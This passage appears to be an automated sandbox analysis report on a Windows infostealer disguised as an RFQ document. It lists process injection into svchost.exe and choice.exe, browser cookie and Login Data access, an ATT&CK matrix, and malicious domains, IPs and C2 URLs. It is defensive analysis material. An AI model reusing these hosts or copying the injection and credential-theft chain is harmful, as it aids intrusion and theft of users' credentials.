                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtTerminateThread: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeThread register set: target process: 1196Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeThread APC queued: target process: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E0E008Jump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"Jump to behavior
                Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
                Source: RFQ _ Virtue 054451000085.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: RFQ _ Virtue 054451000085.exe, iavbXasnTxCeiF.exe, 0000000D.00000002.2749580979.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000000.1866674762.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751135018.0000000001450000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: iavbXasnTxCeiF.exe, 0000000D.00000002.2749580979.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000000.1866674762.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751135018.0000000001450000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: iavbXasnTxCeiF.exe, 0000000D.00000002.2749580979.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000000.1866674762.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751135018.0000000001450000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: iavbXasnTxCeiF.exe, 0000000D.00000002.2749580979.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000000.1866674762.0000000001910000.00000002.00000001.00040000.00000000.sdmp, iavbXasnTxCeiF.exe, 00000011.00000002.2751135018.0000000001450000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST9E64.tmp VolumeInformationJump to behavior
                Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST9E74.tmp VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: RFQ _ Virtue 054451000085.exeBinary or memory string: WIN_81
                Source: RFQ _ Virtue 054451000085.exeBinary or memory string: WIN_XP
                Source: RFQ _ Virtue 054451000085.exeBinary or memory string: WIN_XPe
                Source: RFQ _ Virtue 054451000085.exeBinary or memory string: WIN_VISTA
                Source: RFQ _ Virtue 054451000085.exeBinary or memory string: WIN_7
                Source: RFQ _ Virtue 054451000085.exeBinary or memory string: WIN_8
                Source: RFQ _ Virtue 054451000085.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 10.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2750875662.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2742686769.0000000002310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1948226001.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1950189449.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2751208214.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1952345279.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2753929696.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2750881056.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                2
                LSASS Driver
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                1
                Taint Shared Content
                1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Service Execution
                1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts
                2
                LSASS Driver
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Windows Service
                1
                DLL Side-Loading
                3
                Obfuscated Files or Information
                NTDS126
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                Valid Accounts
                1
                Software Packing
                LSA Secrets251
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                Access Token Manipulation
                1
                Timestomp
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                Windows Service
                1
                DLL Side-Loading
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job412
                Process Injection
                222
                Masquerading
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                Valid Accounts
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                Virtualization/Sandbox Evasion
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                Access Token Manipulation
                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task412
                Process Injection
                KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571270 Sample: RFQ _ Virtue 054451000085.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 44 www.duwixushx.xyz 2->44 46 www.snyp.shop 2->46 48 11 other IPs or domains 2->48 60 Suricata IDS alerts for network traffic 2->60 62 Antivirus detection for URL or domain 2->62 64 Antivirus detection for dropped file 2->64 68 10 other signatures 2->68 10 RFQ _ Virtue 054451000085.exe 3 2->10         started        15 AppVClient.exe 1 2->15         started        17 FXSSVC.exe 15 4 2->17         started        19 6 other processes 2->19 signatures3 66 Performs DNS queries to domains with low reputation 44->66 process4 dnsIp5 50 ssbzmoy.biz 18.141.10.107, 49705, 49707, 49718 AMAZON-02US United States 10->50 52 pywolwnvd.biz 54.244.188.177, 49704, 49706, 49708 AMAZON-02US United States 10->52 36 C:\Windows\System32\alg.exe, PE32+ 10->36 dropped 38 C:\Windows\System32\FXSSVC.exe, PE32+ 10->38 dropped 40 DiagnosticsHub.Sta...llector.Service.exe, PE32+ 10->40 dropped 42 4 other malicious files 10->42 dropped 82 Binary is likely a compiled AutoIt script file 10->82 84 Writes to foreign memory regions 10->84 86 Maps a DLL or memory area into another process 10->86 96 2 other signatures 10->96 21 svchost.exe 10->21         started        88 Antivirus detection for dropped file 15->88 90 Creates files in the system32 config directory 15->90 92 Machine Learning detection for dropped file 15->92 94 Contains functionality to behave differently if execute on a Russian/Kazak computer 15->94 file6 signatures7 process8 signatures9 70 Maps a DLL or memory area into another process 21->70 24 iavbXasnTxCeiF.exe 21->24 injected process10 signatures11 72 Found direct / indirect Syscall (likely to bypass EDR) 24->72 27 choice.exe 13 24->27         started        process12 signatures13 74 Tries to steal Mail credentials (via file / registry access) 27->74 76 Tries to harvest and steal browser information (history, passwords, etc) 27->76 78 Modifies the context of a thread in another process (thread injection) 27->78 80 3 other signatures 27->80 30 iavbXasnTxCeiF.exe 27->30 injected 34 firefox.exe 27->34         started        process14 dnsIp15 54 d48dk.top 154.23.184.207, 49735, 49741, 49747 COGENT-174US United States 30->54 56 www.8312zcksnu.bond 38.165.29.234, 49774, 49781, 49787 COGENT-174US United States 30->56 58 3 other IPs or domains 30->58 98 Found direct / indirect Syscall (likely to bypass EDR) 30->98 signatures16

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                RFQ _ Virtue 054451000085.exe82%ReversingLabsWin32.Virus.Expiro
                RFQ _ Virtue 054451000085.exe75%VirustotalBrowse
                RFQ _ Virtue 054451000085.exe100%AviraW32/Infector.Gen
                RFQ _ Virtue 054451000085.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\AppVClient.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\FXSSVC.exe100%AviraW32/Infector.Gen
                C:\Windows\System32\alg.exe100%AviraW32/Infector.Gen
                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%Joe Sandbox ML
                C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe100%Joe Sandbox ML
                C:\Windows\System32\AppVClient.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe100%Joe Sandbox ML
                C:\Windows\System32\FXSSVC.exe100%Joe Sandbox ML
                C:\Windows\System32\alg.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.snyp.shop/4nyz/0%Avira URL Cloudsafe
                http://54.244.188.177/h100%Avira URL Cloudphishing
                https://whois.gandi.net/en/results?search=sunnyz.store0%Avira URL Cloudsafe
                http://www.duwixushx.xyz/u11p/100%Avira URL Cloudmalware
                http://54.244.188.177/yjbljodlunyhsT0%Avira URL Cloudsafe
                http://54.244.188.177/yjbljodlunyh0%Avira URL Cloudsafe
                http://18.141.10.107:80/punqdgkybis0%Avira URL Cloudsafe
                http://www.8312zcksnu.bond/d3gs/0%Avira URL Cloudsafe
